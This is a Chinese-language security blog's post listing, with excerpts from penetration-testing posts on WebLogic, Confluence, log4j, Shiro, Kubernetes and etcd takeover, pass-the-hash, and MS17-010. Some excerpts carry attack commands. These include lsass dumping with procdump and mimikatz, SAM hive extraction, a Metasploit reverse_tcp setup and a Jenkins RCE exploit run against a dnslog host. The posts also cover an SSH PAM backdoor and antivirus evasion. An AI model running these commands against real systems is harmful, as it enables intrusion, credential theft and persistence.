- 博客(74)
- 收藏
- 关注
RSS订阅
原创 CVE-2020-14882_ALL综合利用工具
简介CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。需要模块:requests、http.client(工具仅用于授权的安全测试,请勿用于非法使用,违规行为与作者无关。)命令回显模块已知成功版本:12.2.1.3.0、12.2.1.4.0、14.1.1.0.0工具地址:https://github.com/GGyao/CVE-2020-14882_ALL(喜欢的点个star喔)选项功能一:命令回显python3 CVE-20
2020-12-07 19:43:19
2464
2
原创 docker搭建简单的ctf题目
0x01 docker常用命令1.拉取镜像。docker pull [image]2.查看docker当前镜像。docker image ls 或 docker images3.新建一个docker容器,并映射端口号。docker run -d -p [host port]:[docker port] [image]4.查看运行中的docker容器。docker ps...
2018-12-07 14:11:09
11166
2
原创 Kubernetes(K8S)各种攻击方法
Kubernetes可以约束一个 Pod 只能在特定的节点上运行。节点亲和性是Pod的一种属性,它使 Pod 被吸引到一类特定的节点 (这可能出于一种偏好,也可能是硬性要求)。污点(Taint)则相反——它使节点能够排斥一类特定的 Pod。容忍度(Toleration)是应用于 Pod 上的,允许(但并不要求)Pod 调度到带有与之匹配的污点的节点上。我们可以控制Pod创建时候的污点来向集群内的节点进行喷洒创建。
2024-01-25 09:33:35
1205
原创 confluence模版注入漏洞_CVE-2023-22527
Confluence是Atlassian公司开发的一款专业的企业知识管理与协同软件,可用于构建企业wiki。Confluence Data Center和Confluence Server多个受影响版本中存在模板注入漏洞,未经身份验证的威胁者可利用该漏洞在受影响的实例上实现远程代码执行。
2024-01-24 17:23:42
511
原创 齐治堡垒机私钥登录及后渗透
(目前在 php 版本齐治成功,其他版本未测试)1、老、新版本私钥。2、直接指定私钥登录,可以使用 xshell、命令行(ssh 端口可能是 22 或者 8022)命令行命令:ssh [email protected] -i rsa -p 22我这里直接使用 xshell 登录了。登录成功。
2024-01-23 14:36:11
526
原创 Hashicorp Consul Service API远程命令执行漏洞
2018年11月27日,Consul在官方博客中发布了有关Consul工具可能存在远程命令执行(RCE)漏洞的公告,并提供了防护该漏洞的配置方案。Consul是HashiCorp公司推出的一款开源工具,旨在实现分布式系统的服务发现与配置。相较于其他分布式服务注册与发现的解决方案,Consul提供更为全面的功能。它内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,无需依赖其他工具(如ZooKeeper等),使用也相对简单。
2024-01-18 14:22:40
1181
原创 log4j2漏洞综合利用_CVE-2021-44228_CNVD-2021-95919
1、在检测到目标存在 log4j2 漏洞后,确定漏洞参数,尝试接受目标 rmi 请求。成功接收到请求。出现 JRMIK 字样即代表可接受 RMI 请求。2、漏洞利用。使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar执行命令,反弹 shell。成功接收 RMI 请求。反弹 shell 成功。
2024-01-16 17:28:58
375
原创 ETCD 未授权访问实战案例
3、通常情况下 etcd 所在 ip 即为 6443 管理端口所在 ip,探测后发现 6443 端口开放,接下来可通过 kubectl 操作 k8s。最终发现/registry/secrets/kube-system/tiller-token-vnnjg 为高权限 token。2、尝试在etcd里查询管理员的token,然后使用该token配合kubectl指令接管集群。pod 数量 131 个,实际容器数量大于等于 131 台。列出kube-system 下所有 pods。1、发现 etcd 未授权。
2024-01-15 17:37:01
961
原创 Kubernetes (K8S) 3 小时快速上手 + 实践
ClusterIP默认的,仅在集群内可用NodePort暴露端口到节点,提供了集群外部访问的入口端口范围固定 30000 ~ 32767需要负载均衡器(通常都需要云服务商提供,裸机可以安装METALLB测试)会额外生成一个 IP 对外服务负载均衡器。Headless适合数据库官网文档。StatefulSet 是用来管理有状态的应用,例如数据库。前面我们部署的应用,都是不需要存储数据,不需要记住状态的,可以随意扩充副本,每个副本都是一样的,可替代的。
2024-01-15 17:34:36
1152
原创 帆软V9任意文件覆盖漏洞+无损上传
由于WebReport V9在安装之后在WebReport目录下存在update.jsp和update1.jsp,因此可以构造payload直接覆盖这两个文件的内容,从而GetShell。要由chartmapsvg开头,包含.svg时会先创建文件,然后再到后续逻辑,所以只需要xxx.svg.jsp这种格式,不需要覆盖原有文件即可无损利用成功。上传其他 webshell 同理,建议哥斯拉、冰蝎等等。注意:木马的双引号要转义一下。
2024-01-15 16:50:28
730
原创 帆软后台(外观配置-主题)文件上传漏洞
webapps/WebReport/WEB-INF/resources/fstheme/fs-theme-test/目录下名称为app.jsp,但当前目录并非 web 目录,web 无法访问 webshell。/webapps/WebReport/bakup/all_bakup/manualbackup/222/WEB-INF/resources/fstheme/fs-theme-app/ 路径下。添加主题上传的压缩包中放入shell.jsp马 (没有添加主题功能直接构造数据包)
2024-01-15 16:48:39
470
原创 gitlab 命令执行漏洞(CVE-2022-2992)
GitLab CE/EE 中的一个漏洞影响从 11.10 开始到 15.1.6 之前的所有版本、从 15.2 开始到 15.2.4 之前的所有版本、从 15.3 开始到 15.3.2 之前的所有版本。允许经过身份验证的用户通过从 GitHub API 端点导入实现远程代码执行。查看 gitlab 版本。(登录后才能看到)
2024-01-15 15:50:03
1083
原创 利用哈希传递登录 RDP 远程桌面
Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员和系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击并成功登录远程桌面。在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 “Restricted Admin Mode” 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录。
2024-01-15 15:18:07
758
原创 gost 多级代理
1、代理链原理,首先需要把最外层跳板机的流量带出来(Frp或gost都可以实现),内层流量(二层、三层、四层等等)代理主要是在每层对应的主机开启gost socks5端口,主要分为非转发代理(./gost -L=socks5://:8899)和转发代理(./gost -L=socks5://:8899 -F=socks5://192.168.202.130:9999),二层推荐非转发代理开启,三层推荐转发代理开启。2、若第二层主机可以访问第三层主机,第三层代理主机不能访问第二层主机,则代理无效。
2024-01-15 15:12:14
2041
原创 crackmapexec工具详解
即使找到有效密码后,使用 --continue-on-success 标志也会继续喷射。CME 确实支持 Kerberos 身份验证,有两种选择,直接使用密码/哈希或使用票证并使用环境KRB5CCNAME名称指定票证。使用选项-k or–use-kcache 时,您需要指定与 kerberos 票证中的主机名相同的主机名 (FQDN)有关通过特定协议使用凭据的详细信息,请参阅相应的 wiki 部分。2、当使用包含特殊符号的用户名或密码时,请将它们用单引号引起来,以使 shell 将它们解释为字符串。
2024-01-12 10:12:58
1138
原创 vcenter综合利用总结
ESXi:安装在实体服务器上,其实是个linux内核的操作系统,官方的说法是有自己专利的一个内核,不属于以往任何现有的产品。只有安装了ESXi以后你才能在上面创建虚拟机。你可以理解成在你的台式机上装的vmware workstation,只不过ESXi不用运行在操作系统上(因为本身就是操作系统)而为虚拟机直接调用硬件资源。vCenter:就是个管理软件,用来管理虚拟机和实体机,比如通过vCenter监控虚拟运行情况、创建虚拟机、调整虚拟机资源、迁移虚拟机等等。
2024-01-12 09:47:54
1126
原创 01-Shiro550漏洞流程
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值,先base64解码然后AES解密再反序列化,就导致了反序列化RCE漏洞。那么,Payload产生的过程:命令 -> 序列化 -> AES加密 -> base64编码 -> RememberMe Cookie值。
2023-04-30 19:49:10
837
1
原创 springboot读取shirokey命令执行
0x1 简介当springboot遇到shiro,一切变得合理了起来。0x2 利用存在springboot env页面https://xxx/api/actuator/env但未发现明文shirokey,如图这种的。使用visualvm工具读取shiro字节类型key。下载:https://visualvm.github.io/download.html(工具在/bin目录下)导入heapdump,在过滤文件中搜索如下条件。org.apache.shiro.web.mgt.Cooki
2022-03-31 14:51:53
1922
1
原创 AD CS证书服务中继攻击
0x1 简介AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。注:借图0x2 环境信息域控(windows server 2016):192.168.3.129辅控(windows server 2016):192.168.3.131(AD CS)域内主机(windows 10):192.168.3.171攻击机(kali):192.168.3.158搭建ADCS证书服务:https://mp.
2022-03-05 21:23:55
3816
原创 cobaltstrike域前置
给cobaltstrike加域前置是一项非常简单而有用的技术,cobaltstrike有了域前置可以大大提升其隐蔽性,同时也保护了我们cobaltstrike服务端的真实ip,增加了防守方反制的难度。cobaltstrike域前置1、登录腾讯云,开启cdn服务。添加高可信域名。回源地址设置为vps地址。添加成功。2、修改profile文件图中两处,指定Host使得CDN把请求转发到我们的服务器。https://github.com/rsmudge/Malleable-C2-Profil
2021-11-01 21:17:16
3389
原创 SSH PAM后门(万能密码、记录密码)
PAM是Linux默认的ssh认证登录机制,我们可以通过修改源码来实现万能密码,记录登陆密码等功能。1、在centos中需要关闭selinux。永久关闭需要修改/etc/selinux/config,将其中SELINUX设置为disabled。2、查看PAM版本。rpm -qa|grep pam源码下载地址:http://www.linux-pam.org/library/3、解压。wget http://www.linux-pam.org/library/Linux-PAM-1.1.8
2021-08-19 16:07:11
3185
原创 MS17010漏洞利用总结
0x01 常规打法扫描是否存在ms17-010漏洞:nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --openMSF常规漏洞利用:msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 反向打:msf > set payload windows/x64/meterpreter/reverse_tcp m
2021-08-17 21:06:58
4942
原创 木马免杀实践-golang
0x01 简介这里以github上一个golang免杀项目为例,项目地址:https://github.com/yumusb/CS-Loader/tree/master/go%E7%89%88%E6%9C%AC,原项目使用方法如下,根据其要求生成cobaltstrike木马后,上传virustotal,免杀效果已经比较差了,且生成木马大小为5.9M,比较大。0x02 解读原项目原项目–python加密部分此项目加密shellcode采用的方式是base64 -> RC4加密 -> bas
2021-08-09 13:16:51
1858
原创 Spring-boot远程代码执行系列(eureka xstream deserialization RCE)
0x1 漏洞原理1.eureka.client.serviceUrl.defaultZone 属性被设置为恶意的外部 eureka server URL 地址。2.refresh 触发目标机器请求远程 URL,提前架设的 fake eureka server 就会返回恶意的 payload。3.目标机器相关依赖解析 payload,触发 XStream 反序列化,造成 RCE 漏洞。0x2 漏洞利用条件1.可以 POST 请求目标网站的 /env 接口设置属性2.可以 POST 请求目标网站的
2020-10-05 22:27:58
5598
2
原创 CVE-2020-1472 域内提权
0x1 工具这里使用zerologon_tester(https://github.com/SecuraBV/CVE-2020-1472)工具验证漏洞是否存在,使用zerologon(https://github.com/risksense/zerologon)工具复现。运行set_empty_pw.py脚本需要最新版的impacket(https://github.com/SecureAuthCorp/impacket/commit/64ce46580286b5ab15a4737bddf85201ce
2020-09-16 21:26:35
6057
原创 Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE)
0x01 漏洞原理spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化
2020-06-18 23:37:22
8052
1
原创 Spring-boot远程代码执行系列(whitelabel error page SpEL RCE)
0x01 漏洞原理spring boot 处理参数值出错,流程进入 org.springframework.util.PropertyPlaceholderHelper 类中此时 URL 中的参数值会用 parseStringValue 方法进行递归解析。其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解
2020-06-16 21:37:23
4109
原创 Jenkins远程命令执行漏洞(CVE-2018-1000861)
漏洞复现1、查看目标版本。curl -s -I http://xxx:8080| grep X-Jenkins2、利用工具。https://github.com/orangetw/awesome-jenkins-rce-2019usage:python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’3、成功接收dnslog。...
2020-05-23 22:16:58
3130
原创 AI web1靶机知识点
搬砖日常ing…靶机地址:https://www.vulnhub.com/entry/ai-web-1,353/0x01 sqlmap之–os-shell1、条件1)需要网站绝对路径(phpinfo或网站报错信息获取)。2)该路径目录允许写入2、os-shell1)一般上传目录都是允许写入的,靶机这里刚好有个upload目录,可成功执行–os-shell。2)sqlmap --...
2020-04-12 17:52:47
683
原创 域用户爆破(DomainPasswordSpray)
0x01 介绍UserList - Optional UserList parameter. This will be generated automatically if not specified.Password - A single password that will be used to perform the password spray.P...
2020-03-03 21:20:16
2215
1
原创 通过xencrypt免杀invoke-mimikatz.ps1
0x01 简介xencrypt目前测试只在windows 2012 powershell下可正常使用,需要依赖原本的invoke-mimikatz.ps1,生成以后可多次使用。0x02 使用1、下载invoke-mimikatz.ps1到同级目录下。https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exf...
2020-03-03 20:44:53
1545
原创 mailsniper.ps1使用
下载地址:mailsniper0x01 mailsniper.ps1获取outlook所有联系人(为爆破收集邮箱)在域环境内(域内机器即可)执行命令:powershell -exec bypassImport-Module .\MailSniper.ps1Get-GlobalAddressList -ExchHostname owa2013.rootkit.org -UserName ...
2020-02-29 13:24:35
2985
原创 密码抓取--获取已控机器本地保存的RDP密码
0x01 简介在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。0x02 获取已控机器本地保存的RDP密码一、mimikatz1、查看本地机器本地连接过的目标机器。reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...
2020-02-24 12:59:18
16286
原创 PTH横向移动
0x01 简介PTH全称“pass the hash”,即hash传递。PTH通过smb服务进行,走445端口。0x02 通过PTH横向移动一、通过cobaltstrike进行PTH1、在已上线机器中直接dir访问目标系统C盘,提示没权限。beacon> shell dir \192.168.3.123\c$2、此处使用先前已获取的hash对目标administrator用户...
2020-02-24 12:17:33
4456
1
原创 winRM横向移动
0x01 winRM简介WinRM 是 Microsoft 对 WS-Management 协议的实现,WS-Management 协议即一种基于标准简单对象访问协议[SOAP]的 “防火墙友好” 协议,它让来自不同供应商的硬件和操作系统能够互相操作。winRM的默认端口为5985(http)或5986(https)。winRM横向移动同时适用于工作组和域环境。0x02 利用条件1、在w...
2020-02-15 20:07:18
1799
1
原创 Redis 4.x5.x 未授权访问漏洞(RCE)
0x01 简介Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。0x02 漏洞复现1、环境启动后,通过redis-cli -h your-ip即可进行连接,可见存在未授权访问漏洞。2、使用如下POC即可直接执行命令。工具地址:https://github.com/vulhub/redis-rogu...
2020-02-14 22:36:02
1363
1
原创 一个简单探测jboss漏洞的工具
0x01 项目介绍自研工具。批量探测jboos系列漏洞路径,特别在内网渗透中,提高效率。(此工具仅探测漏洞所在路径,漏洞是否存还需对应exp验证。)项目地址:https://github.com/GGyao/jbossScan0x02 jboss漏洞介绍CVE-2015-7501JBoss JMXInvokerServlet 反序列化漏洞。此漏洞存在于JBoss中/invoker/JMX...
2020-02-13 21:17:40
2862
原创 密码抓取--reg免杀抓hash
1、下载下面3个文件reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hivreg save hklm\security security.hiv2、获取密码hash方法1:使用mimikatz(本地机器系统与位数最好与目标主机保持一致)mimikatz.exe “lsadump::sam /system:sys.hiv /sam:...
2020-02-13 19:09:15
1061
原创 密码抓取--Prodump+Mimikatz抓取windows系统密码
1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。query user2、查看目标系统版本。wmic OS get Caption,OSArchitecture3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。procdump64.exe -accepteula -ma lsass.exe lsass.dmp...
2020-02-13 18:35:51
1195
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人